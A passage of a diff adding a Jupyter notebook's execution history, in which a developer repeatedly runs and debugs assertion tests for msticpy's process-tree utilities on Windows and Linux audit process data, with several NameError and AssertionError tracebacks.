+        "\u001b[1;32m<ipython-input-4-bed42a8ae093>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m4\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mNameError\u001b[0m: name 's_tree' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:17:02.936Z"
+   },
+   {
+    "cell": {
+     "executionCount": 5,
+     "executionEventId": "c6b2e09a-d4fa-4925-8de1-82e61df0e6f2",
+     "hasError": false,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [],
+     "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:17:36.216Z"
+   },
+   {
+    "cell": {
+     "executionCount": 6,
+     "executionEventId": "9db1cb61-cd47-43ed-9e90-43ac1ca8a29f",
+     "hasError": true,
+     "id": "8daff457-1793-41c5-8a53-32ee77a2d3a8",
+     "outputs": [
+      {
+       "ename": "NameError",
+       "evalue": "name 'linux_proc' is not defined",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mNameError\u001b[0m                                 Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-6-295cd33b8df0>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mlinux_proc_test\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mlinux_proc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;36m1000\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      2\u001b[0m \u001b[0mp_tree_l\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mlinux_proc_test\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mdebug\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mNameError\u001b[0m: name 'linux_proc' is not defined"
+       ]
+      }
+     ],
+     "persistentId": "f60daf1c-6e02-437f-b160-119cabaf78ad",
+     "text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)"
+    },
+    "executionTime": "2019-12-13T21:28:34.067Z"
+   },
+   {
+    "cell": {
+     "executionCount": 7,
+     "executionEventId": "8818282d-e4e6-4dd9-a5a0-139898c773a9",
+     "hasError": false,
+     "id": "4e1af7b3-205b-4f5f-8920-6f42d637e97c",
+     "outputs": [],
+     "persistentId": "087a8016-3bfa-41be-9f01-05822405a004",
+     "text": "from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset\n# linux_events_all = pd.read_pickle(\"../experimental/linux_events_all.pkl\")\nlinux_events_all = pd.read_pickle(\"linux_events_all.pkl\")\nlen(linux_events_all)\nlinux_proc = get_event_subset(linux_events_all, \"SYSCALL_EXECVE\")\nlinux_proc.columns\nlen(linux_proc)\npd.to_pickle(linux_proc, \"../demos/data/linux_proc_test.pkl\")"
+    },
+    "executionTime": "2019-12-13T21:28:41.917Z"
+   },
+   {
+    "cell": {
+     "executionCount": 8,
+     "executionEventId": "b292254e-8516-48a9-8d6b-efcf9c1df1a8",
+     "hasError": false,
+     "id": "8daff457-1793-41c5-8a53-32ee77a2d3a8",
+     "outputs": [
+      {
+       "data": {
+        "application/vnd.jupyter.widget-view+json": {
+         "model_id": "1a3c4a26e7ae4d0c86fd706498fdb9b2",
+         "version_major": 2,
+         "version_minor": 0
+        },
+        "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Original # procs 1000\nMerged # procs 1000\nMerged # procs - dropna 303\nUnique merged_procs index in merge 1000\nThese two should add up to top line\nRows with dups 0\nRows with no dups 1000\n0 + 1000 = 1000\noriginal: 1000 inferred_parents 29 combined 1029\nhas parent time 647\neffectivelogonId in subjectlogonId 1029\nparent_proc_lc in procs 1000\nProcessId in ParentProcessId 532\nParent_key in proc_key 1000\nParent_key not in proc_key 29\nParent_key is NA 29\n{'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n"
+      }
+     ],
+     "persistentId": "f60daf1c-6e02-437f-b160-119cabaf78ad",
+     "text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)"
+    },
+    "executionTime": "2019-12-13T21:28:44.326Z"
+   },
+   {
+    "cell": {
+     "executionCount": 9,
+     "executionEventId": "7bcd018f-ee7b-494e-a3d3-6bb4eb7ad0cf",
+     "hasError": false,
+     "id": "4e1af7b3-205b-4f5f-8920-6f42d637e97c",
+     "outputs": [],
+     "persistentId": "087a8016-3bfa-41be-9f01-05822405a004",
+     "text": "from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset\n# linux_events_all = pd.read_pickle(\"../experimental/linux_events_all.pkl\")\nlinux_events_all = pd.read_pickle(\"linux_events_all.pkl\")\nlen(linux_events_all)\nlinux_proc = get_event_subset(linux_events_all, \"SYSCALL_EXECVE\")\nlinux_proc.columns\nlen(linux_proc)\npd.to_pickle(linux_proc.iloc[:1000], \"../demos/data/linux_proc_test.pkl\")"
+    },
+    "executionTime": "2019-12-13T21:29:18.632Z"
+   },
+   {
+    "cell": {
+     "executionCount": 10,
+     "executionEventId": "2c17ab4d-aee6-4326-a1e7-3517dfbe7920",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-10-ab6fc72e75d3>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m4\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:35:33.600Z"
+   },
+   {
+    "cell": {
+     "executionCount": 12,
+     "executionEventId": "16362baa-0af6-4d36-b14f-73642da5bf16",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-12-288f43e6eeb3>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:38:38.051Z"
+   },
+   {
+    "cell": {
+     "executionCount": 14,
+     "executionEventId": "2eaf8840-79c1-4b79-8397-2ff07686fa76",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-14-ead67ce0dfae>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m1\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[1]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:38:51.637Z"
+   },
+   {
+    "cell": {
+     "executionCount": 16,
+     "executionEventId": "c0107255-05da-4b5c-ab3b-463584c7887e",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
+       "evalue": "",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mAssertionError\u001b[0m                            Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-16-288f43e6eeb3>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[0;32m      2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mAssertionError\u001b[0m: "
+       ]
+      }
+     ],
+     "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20",
+     "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n    'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH"
+    },
+    "executionTime": "2019-12-13T21:39:02.341Z"
+   },
+   {
+    "cell": {
+     "executionCount": 18,
+     "executionEventId": "4c080033-4bb9-4633-ba59-d371c1b58ff1",
+     "hasError": true,
+     "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2",
+     "outputs": [
+      {
+       "ename": "AssertionError",
